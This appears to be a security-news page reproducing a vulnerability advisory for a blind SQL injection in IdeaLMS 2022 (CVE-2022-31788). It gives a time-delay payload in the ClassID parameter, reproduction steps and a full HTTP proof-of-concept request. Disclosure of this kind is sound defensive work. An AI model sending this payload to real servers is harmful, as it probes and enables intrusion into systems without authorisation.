Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-31788: SQL Injection Vulnerability PoC #1 - IdeaLMS

IdeaLMS 2022 allows SQL injection via the IdeaLMS/ChatRoom/ClassAccessControl/6?isBigBlueButton=0&ClassID= pathname.

CVE
Open in Source
#sql#vulnerability#windows#firefox

Vulnerability Type: SQL Injection Vulnerability (Boolean-Based Blind)

Vendor of Product: Ideaco.ir

Affected Product Code Base: IdeaLMS

Product Version: 2022

Description: IdeaLMS allows SQL Injection via the ClassID parameter

Attack Vectors: Attacker should inject malicious payload into ClassID parameter

Attack Type: Remote

Payload: -1%20waitfor%20delay’0%3a0%3a20’–

Assigned CVE-ID: <TBD>

Discoverer: Mohammad Reza Ismaeli Taba, Raspina Net Pars Group (RNPG Ltd.)

Steps To Reproduce

1. Browse the following page: https://<target.xyz>/IdeaLMS/ChatRoom/ClassAccessControl/6?isBigBlueButton=0&ClassID=6

2. Insert the malicious query as the value in ClassID parameter

Example: https://<target.xyz>/IdeaLMS/ChatRoom/ClassAccessControl/6?isBigBlueButton=0&ClassID=-1%20waitfor%20delay’0%3a0%3a20’–

#PoC

GET /IdeaLMS/ChatRoom/ClassAccessControl/6?isBigBlueButton=0&ClassID=-1%20waitfor%20delay’0%3a0%3a20’-- HTTP/1.1

Host: <address in which IdeaLMS is set up>

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE